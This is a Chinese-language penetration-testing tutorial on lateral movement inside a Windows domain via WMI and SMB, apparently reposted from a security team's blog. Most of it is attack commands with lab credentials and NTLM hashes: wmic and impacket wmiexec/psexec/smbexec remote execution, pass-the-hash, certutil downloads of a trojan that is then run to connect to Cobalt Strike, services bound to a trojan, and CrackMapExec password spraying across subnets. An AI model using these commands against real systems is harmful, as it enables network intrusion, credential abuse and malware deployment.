0
  • 聊天消息
  • 系统消息
  • 评论与回复
登录后你可以
  • 下载海量资料
  • 学习在线课程
  • 观看技术视频
  • 写文章/发帖/加入社区
会员中心
创作中心

完善资料让更多小伙伴认识你,还能领取20积分哦,立即完善>

3天内不再提示

什么是WMI?WMI利用手法介绍

jf_vLt34KHi 来源:Tide安全团队 2023-02-12 09:40 次阅读

WMI

什么是WMI?

WMI是通过135端口进行利用,支持用户名明文或hash的方式进行认证,在使用WMIC执行命令过程中,操作系统默认不会将WMIC的操作记录在日志中,因此在利用过程中不会产生日志。所以越来越多的攻击者开始渐渐使用WMI进行攻击。

WMI的利用条件

1.获得目标机器的用户名和密码

2.开放139、445端口

WMIC的使用需要对方开启135端口(有的工具需要445端口)和admin$共享,135端口是WMI默认的管理端口

WMI利用手法

WMI演示环境如下图:

f16595d2-a9e3-11ed-bfe3-dac502259ad0.png

WMIC

系统自带的WMIC命令是单执行,无回显的,并且只支持明文密码,不支持hash进行传递 在这里,我们对SQLserver执行了一个ipconfig的命令,并将结果保存在C盘的ip.txt文件中:

wmic/node:192.168.3.32/user:administrator/password:admin!@#45processcallcreate"cmd.exe/cipconfig>c:ip.txt

f175f300-a9e3-11ed-bfe3-dac502259ad0.png

可以看到我们并无法直接看到命令的回显,但我们上帝视角切到靶机发现确实是执行命令了的 。

f19752ca-a9e3-11ed-bfe3-dac502259ad0.png

这里如果在实战中,如果想要查看文件内容和文件是否上传成功的话,就要使用上篇文章内网移动-IPC中的type和dir命令

dir\192.168.3.32c$#列出该主机的C盘下的文件 type\192.168.3.32c$ip.txt

f1b501bc-a9e3-11ed-bfe3-dac502259ad0.pngf1d68b16-a9e3-11ed-bfe3-dac502259ad0.png

这里将其上线CS的步骤也是:使用下载命令让其下载Web Server中的木马,执行上线

wmic/node:192.168.3.32/user:administrator/password:admin!@#45processcallcreate"cmd.exe/ccertutil-urlcache-split-f "#下载Webserver中的木马文件到自己的C盘

f1fa3106-a9e3-11ed-bfe3-dac502259ad0.png

wmic/node:192.168.3.32/user:administrator/password:admin!@#45processcallcreate"cmd.exe/cc:/4444.exe"#执行木马

f21184b4-a9e3-11ed-bfe3-dac502259ad0.png

可以看到此时sqlserver成功被上线。

f22bb9ba-a9e3-11ed-bfe3-dac502259ad0.png

wmiexec.vbs

wmiexec.vbs 脚本通过 VBS 调用 WMI 来模拟 PsExec 的功能,wmiexec.vbs 下载地址:https://github.com/k8gege/K8tools/blob/master/wmiexec.vbs,交互式,适合在反弹shell或msfconsole中使用,不适合CS控制 首先我们将其上传到跳板机中,然后再使用命令去连接,由于CS无法返回shell的问题,所以该脚本并不适用于在CS中运行,所以这里我选择将会话转移到MSF中去运行。

f237bb20-a9e3-11ed-bfe3-dac502259ad0.png

cscript//nologowmiexec.vbs/shell192.168.3.32administratoradmin!@#45

f24171f6-a9e3-11ed-bfe3-dac502259ad0.png

可以看到在MSF中运行了该文件后,成功将sqlserver的shell反弹了过来,在此我们可以直接让其下载后门并执行,上线到我们的CS中。

cmd.exe/ccertutil-urlcache-split-f

f2556742-a9e3-11ed-bfe3-dac502259ad0.png

可以看到SQLserver成功上线CS

wmiexec-impacket

impacket套件中的wmiexec同样可对WMI进行横向移动,并且支持交互式与单执行,支持hash进行传递,相对来说更为方便,这里直接使用它的py脚本配合socket代理就可以对其内网进行横向移动,避免了上传文件等敏感操作。首先设置好Socket代理,与proxifier的代理与代理规则

f268a65e-a9e3-11ed-bfe3-dac502259ad0.pngf278f23e-a9e3-11ed-bfe3-dac502259ad0.pngf29125b6-a9e3-11ed-bfe3-dac502259ad0.png

配置好socket代理与规则后,就可直接在本机中调用wmiexec.py文件对其内网进行wmi利用

pythonwmiexec.py./administrator:Admin12345@192.168.3.21#通过明文密码连接获得目标本地用户交互式shell pythonwmiexec.pygod/administrator:Admin12345@192.168.3.21#通过明文密码连接获得目标域用户交互式shell

f2a8c842-a9e3-11ed-bfe3-dac502259ad0.pngf2cf77f8-a9e3-11ed-bfe3-dac502259ad0.png

通过该命令成功获得一个交互式的shell,那么wmiexec.py也可单执行命令。

pythonwmiexec.py./administrator:admin!@#45@192.168.3.32"whoami"#以明文密码连接本地用户并执行命令

f2f5c886-a9e3-11ed-bfe3-dac502259ad0.png

pythonwmiexec.py-hashes:518b98ad4178a53695dc997aa02d455c./administrator@192.168.3.32"whoami"#以hash密码连接本地用户并执行命令

f3075c72-a9e3-11ed-bfe3-dac502259ad0.png

这里将目标上线CS的方式和上面一致,通过命令下载木马并执行。

pythonwmiexec.py-hashes:518b98ad4178a53695dc997aa02d455c./administrator@192.168.3.32"cmd.exe/ccertutil-urlcache-split-f "

f315ca32-a9e3-11ed-bfe3-dac502259ad0.png

SMB

什么是SMB?

SMB(Server Message Block)服务器信息块,它也是一种客户端到服务器的通信协议。除此之外,SMB协议也被称为请求-回复协议。客户端与服务器建立连接后,客户端可以向服务器发送SMB命令允许用户访问共享、打开、读取或者是写入文件

SMB的利用条件

1. 利用SMB服务可以通过明文或hash传递来远程执行,条件445服务端口开放。

2.获得该目标的账号名与密码或hash

SMB利用手法

SMB演示环境如下图:

f33c48f6-a9e3-11ed-bfe3-dac502259ad0.png

PsExec

官方Psexec

Psexec 是由 Mark Russinovich 创建的 Sysinternals Suite中包含的工具。最初,它旨在作为系统管理员的便利工具,以便他们可以通过在远程主机上运行命令来执行维护任务。后来因为太过方便,被利用到内网渗透之中,但不支持hash传递,且CS无法利用,而且该工具好像只能在具有桌面权限后才可进行利用,我这里使用msf和反弹shell都无法成功反弹shell.... 这里将psexec.64上传到跳板机中

f34e367e-a9e3-11ed-bfe3-dac502259ad0.png

然后在跳板机桌面中运行该工具,就会反弹出目标机器的shell,如下图所示

psexec64.exe\192.168.3.32-uadministrator-padmin!@#45-scmd

f3615e02-a9e3-11ed-bfe3-dac502259ad0.png

Impacket-PsExec

还有一个psexec就是我们的impacket套件中的工具,官方psexec有诸多限制,如不支持hash、cs、msf无法利用成功等问题,所以这里选择使用impacket中的psexec工具就相对来说比较灵活,同样,为了避免发送上传文件时数据丢失或被查杀等问题,我们可使用socket+psexec.py对其内网进行横向移动。socket配置此处不再描述,这里直接使用impacket-Psexec.py进行利用

psexec.py./administrator:admin!@#45@192.168.3.32#通过明文密码连接获得目标本地用户交互式shell psexec.pygod/administrator:Admin12345@192.168.3.21#通过明文密码连接获得目标域用户交互式shell

f39025de-a9e3-11ed-bfe3-dac502259ad0.pngf3ab14e8-a9e3-11ed-bfe3-dac502259ad0.png

pythonpsexec.py-hashes:518b98ad4178a53695dc997aa02d455c./administrator@192.168.3.32#通过哈希密码连接获得目标本地用户交互式shell pythonpsexec.py-hashes:ccef208c6485269c20db2cad21734fe7god/administrator@192.168.3.21#通过哈希密码连接获得目标域用户交互式shell

f3c0ae02-a9e3-11ed-bfe3-dac502259ad0.pngf3e05d10-a9e3-11ed-bfe3-dac502259ad0.png

CS插件-psexec

在我们的CS中其实也有PSEXEC利用功能,且利用较为方便与简单,在targets中选中目标右键即可弹出利用选项,且支持hash的移动

f40a39c8-a9e3-11ed-bfe3-dac502259ad0.png

点击psexec64后,就会让我们选择用户名密码与所登录域等,这里我们直接选择之前我们在跳板机中所收集的密码,Domain置空的话为本地用户登录,输入域名后则为域用户登录,选择监听器和会话之后,点击Launch即可。

f41c0f7c-a9e3-11ed-bfe3-dac502259ad0.pngf42e0182-a9e3-11ed-bfe3-dac502259ad0.png

这里看到Sqlserver成功上线,这里如果想以域用户的身份登录时,Domain处输入域名即为域用户身份登录。

f447c252-a9e3-11ed-bfe3-dac502259ad0.png

较为简单,这里不做过多讲解。

smbexec-impacket

在impacket中smbexec工具也可以进行移动,该工具利用方式和psexec利用方式相同,这里简单介绍一下即可

pythonsmbexec.py./administrator:admin!@#45@192.168.3.32#通过明文密码连接获得目标本地用户交互式shell pythonsmbexec.py-hashes:ccef208c6485269c20db2cad21734fe7god/administrator@192.168.3.21#通过哈希密码连接获得目标域用户交互式shell

f46bf244-a9e3-11ed-bfe3-dac502259ad0.pngf496adf4-a9e3-11ed-bfe3-dac502259ad0.png

Services

同时还有一个系统自带的服务也可进行利用,该服务支持哈希密码传递,且为单执行无回显,无法交互shell。具体利用过程如下:首先建立SMB连接后,创建一个服务,服务绑定木马,然后在启动该服务,即可上线到CS中

services-hashes:518b98ad4178a53695dc997aa02d455c./administrator:@192.168.3.32create-nameshell-displayshellexec-pathC:4444.exe#建立SMB连接并创建服务绑定木马 services-hashes:518b98ad4178a53695dc997aa02d455c./administrator:@192.168.3.32start-nameshell#启动shell服务

CrackMapExec

在内网渗透中,能获取到主机管理员账号密码,将会使我们横向事半功倍,尤其是在大内网环境中,密码复用率很高,一波喷洒,能助力你拿到一波主机,对拿到的主机再次抓取密码,再用新拿到的密码喷洒一波......,如此反复。密码喷洒的思路就是这样:不断收集内网账号密码,不断去喷洒。这时我们就需要类似CrackMapExec这样的密码喷洒工具,对其内网进行密码喷洒。CrackMap同样的,CrackMapExec支持本地、域内和明文密文的fuzz,具体利用命令如下:域用户明文密码喷洒:

proxychainscrackmapexecsmb192.168.3.21-32-udbadmin-p'Admin12345'

f4b08f80-a9e3-11ed-bfe3-dac502259ad0.png

本地用户明文密码喷洒:

proxychainscrackmapexecsmb192.168.3.21-32-uadministrator-p'admin!@#45'--local-auth

f4d61cfa-a9e3-11ed-bfe3-dac502259ad0.png

域内用户hash密码喷洒

proxychainscrackmapexecsmb192.168.3.32-udbadmin-H'518b98ad4178a53695dc997aa02d455c'

f527e6de-a9e3-11ed-bfe3-dac502259ad0.png

本地用户hash密码喷洒

proxychainscrackmapexecsmb192.168.3.32-uadministrator-H'518b98ad4178a53695dc997aa02d455c'--local-auth

f54cbb08-a9e3-11ed-bfe3-dac502259ad0.png

执行命令也是非常的简单,这里直接在上面命令后加上-x 'bash' 即可

proxychainscrackmapexecsmb192.168.3.32-uadministrator-H'518b98ad4178a53695dc997aa02d455c'--local-auth-x'whoami'

f5746072-a9e3-11ed-bfe3-dac502259ad0.png

当然这里也可以通过已经喷洒出的主机和密码配合CS中的psexec上线到CS中。此处就不再演示。







审核编辑:刘清

声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容侵权或者其他违规问题,请联系本站处理。 举报投诉
  • SQL
    SQL
    +关注

    关注

    1

    文章

    764

    浏览量

    44127
  • SMB
    SMB
    +关注

    关注

    0

    文章

    38

    浏览量

    11761
  • WMI
    WMI
    +关注

    关注

    0

    文章

    2

    浏览量

    6079
  • Hash算法
    +关注

    关注

    0

    文章

    43

    浏览量

    7382

原文标题:横向移动-WMI、SMB

文章出处:【微信号:Tide安全团队,微信公众号:Tide安全团队】欢迎添加关注!文章转载请注明出处。

收藏 人收藏

    评论

    相关推荐

    IE工具--IE七大手法

    IE工具--IE七大手法
    发表于 05-06 19:36

    在passthrough中使用GPU进行测试

    我在xenserver 6.2 SP1上的传递模式中有K2,我正在尝试确定我的应用程序如何强调GPU。我添加了nvidia WMI包,但是对于我关心的所有GPU值,例如内存和%GPU,windows
    发表于 10-10 16:17

    变频电源的操作手法

    在你购买任何一样电器产品的时候,销售员都会告诉你使用方法是怎样的,应该注意些什么。因为每个产品都会用专用的操作手法,这样就会在避免操作错误或者不当而造成损害。变频电源也是一样,也有正确的操作手法
    发表于 12-30 07:09

    怎么修改笔记本盖上的电源设置

    一个网友问怎么修改笔记本盖上的电源设置,比较直接的方式可以直接通过wmi修改。比如说$Name=@{Namespace='root\cimv2\power'}$ID
    发表于 03-02 06:34

    mcuxpresso Windows 10 21H1和Windows 11无法运行程序wmic createprocess error=2怎么解决?

    频道版本中已弃用。此工具已被适用于 WMI 的 Windows PowerShell 取代。注意:此弃用仅适用到命令行管理工具。WMI 本身不受影响。”临时解决方法:幸运的是我还有一个
    发表于 04-04 08:40

    基于WMI的实时监控系统设计与实现

    本文设计了一个基于WMI的系统性能实时监控系统,使用JFreeChart设计用户界面,从而实现系统性能的实时监控,并对系统实现过程中涉及到的关键技术进行了研究分析。关键词: WMI
    发表于 06-20 08:42 27次下载

    BS架构下基于WMI实现映射网络驱动器

    利用网络映射驱动器将学生平时上机练习的文件和计算机网络化考试时学生的考试文件直接保存在服务器上,可以有效的管理学生的文件,防止文件丢失。针对传统映射方法工作
    发表于 12-25 16:42 18次下载

    常用QC手法应用实务

    常用QC手法应用实务 本课程以实际应用为导向,说明并整合QC7手法与新QC7手法(管理7手法)以讲师资深实务经验,依企业实际状况,组合改善活动常用工具、方法,参加学员除
    发表于 02-01 14:02 59次下载

    windowsxp常用命令

    windowsxp常用命令   winver---------检查windows版本 wmimgmt.msc----打开windows管理体系结构(wmi) wupdmgr-------
    发表于 01-10 09:05 1283次阅读

    WINDOWS开始运行中可以起动的程序命令展览

    WINDOWS开始运行中可以起动的程序命令展览 winver---------检查Windows版本 wmimgmt.msc----打开windows管理体系结构(WMI) wupdmgr--------windows更
    发表于 01-14 10:58 757次阅读

    氩弧焊焊接手法与技巧

    本文主要阐述了氩弧焊焊接手法与技巧。
    发表于 08-26 13:57 2.9w次阅读

    建筑照明系统设计的表现手法介绍

    古建筑是城市景观的重要组成部分,反映了一座城市的文化底蕴和历史气息。那么,中国古建筑照明设计有哪些灯光表现手法
    的头像 发表于 12-24 12:24 538次阅读

    常见服务弱口令爆破工具:crack

    支持常见服务口令爆破(未授权检测):ftp、ssh、wmi、wmihash 、smb、mssql、oracle、mysql、rdp。
    的头像 发表于 10-31 11:30 2389次阅读

    什么是PTH?PTH利用手法介绍

    pass the hash:哈希传递攻击,简称PTH,是在内网渗透中一种很经典的攻击方式
    的头像 发表于 05-16 09:44 3330次阅读
    什么是PTH?PTH<b class='flag-5'>利用手法</b><b class='flag-5'>介绍</b>

    新QC七大手法(工具)完整版介绍

    导语“七大手法”主要是指企业质量管理中常用的质量管理工具,昨天给大家介绍的老七种手法。“老七种”有分层法、调查表、排列法、因果图、直方图、控制图和相关图,新的QC七种工具分别是系统图、关联图、亲和图
    的头像 发表于 04-09 09:42 3635次阅读
    新QC七大<b class='flag-5'>手法</b>(工具)完整版<b class='flag-5'>介绍</b>